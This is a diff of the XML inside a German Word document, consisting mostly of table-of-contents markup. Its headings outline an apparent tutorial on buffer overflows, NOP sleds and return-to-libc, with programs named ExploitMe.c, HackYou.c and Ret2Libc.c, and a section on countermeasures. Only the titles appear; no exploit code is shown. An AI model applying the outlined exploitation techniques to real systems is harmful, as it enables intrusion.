+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281417" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Stack von ExploitMe.c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281417 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281418" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Wie können wir das ausnutzen(exploit)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281418 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281419" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Konzept von HackYou.c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281419 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281420" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Quellcode HackYou.c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281420 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281421" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Durchführung</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281421 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281422" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Return to Libc</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281422 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>15</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281423" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>NOP-Rutschen machen das Leben einfacherer</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281423 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>15</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281424" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Techniken um Buffer Overflow zu verhindern</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281424 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281425" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Non-Executable Stack</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281425 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281426" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Return to Libc</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281426 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281427" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Was ist der Plan</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281427 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281428" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Wie nutzen wir das aus und warum funktioniert es?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281428 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>17</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281429" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Stackaufbau</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281429 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>19</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281430" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>ExploitMe2.c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281430 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>19</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281431" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>GetEnvironmentVarAddr.c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281431 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>19</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Verzeichnis3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="de-DE"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc339281432" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Ret2Libc.c</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc339281432 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>20</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:bCs/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:p>
+      </w:sdtContent>
+    </w:sdt>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="berschrift1"/>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc339281403"/>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="1"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Buffer</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -36,6 +2186,7 @@
       <w:r>
         <w:t>?</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -100,9 +2251,11 @@
       <w:pPr>
         <w:pStyle w:val="berschrift1"/>
       </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc339281404"/>
       <w:r>
         <w:t>Eine einfache angreifbare Funktion</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:r>
@@ -427,6 +2580,7 @@
       <w:pPr>
         <w:pStyle w:val="berschrift1"/>
       </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc339281405"/>
